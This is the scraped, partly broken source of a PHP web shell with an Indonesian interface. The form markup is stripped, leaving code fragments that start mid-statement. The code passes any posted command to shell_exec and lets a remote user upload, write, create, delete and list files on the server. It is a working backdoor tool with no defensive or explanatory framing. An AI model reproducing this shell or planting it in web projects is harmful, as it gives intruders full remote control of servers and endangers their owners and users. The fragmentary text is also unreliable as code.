Pilih file: Pilih Direktori: exp: /upload/disini/

Masukkan perintah Anda:

Isikan nama direktori yang akan dibuat:


Isikan nama serta format file yang akan dibuat:



Isikan nama serta format file yang akan dihapus:


"; echo "Link: ".$namaFile.""; } else { if(isset($_POST["upload"])) { echo "Upload Gagal!"; } } if(isset($_POST["btn"])) { if(!empty($_POST["cmd"])) { $output = Shell_exec($_POST["cmd"]); echo $output."
"; //echo "
$output
"; } } if(isset($_POST["enter"])) { if(!empty($_POST["dir"])) { $structure = $_POST["dir"]; if (!mkdir($structure, 0, true)) { die('Gagal membuat folder...'); } } } if(isset($_POST["ente"])) { if(!empty($_POST["file"])) { if(!empty($_POST["isi"])) { $file = fopen($_POST["file"],"w"); echo fwrite($file,$_POST["isi"]); fclose($file); } } } if(isset($_POST["ente2"])) { if(!empty($_POST["file2"])) { $file2 = $_POST["file2"]; if (!unlink($file2)) { echo ("Error deleting $file2"); } else { echo ("Deleted $file2"); } } } echo "
"; echo "
========================================================================================================================================
"; ?>
Isikan nama direktori yang akan dibuka:

".$target_dir." :
"; while (($file = readdir($handle)) !== false){ if($file != "." AND $file != "..") {echo '- '.$file.'
';} } closedir($handle); } else { echo "Direktori ".$target_dir." tidak dapat dibuka"; } } else { echo "Direktori ".$target_dir." Tidak ada"; } } } echo "
"; echo "
========================================================================================================================================
"; ?>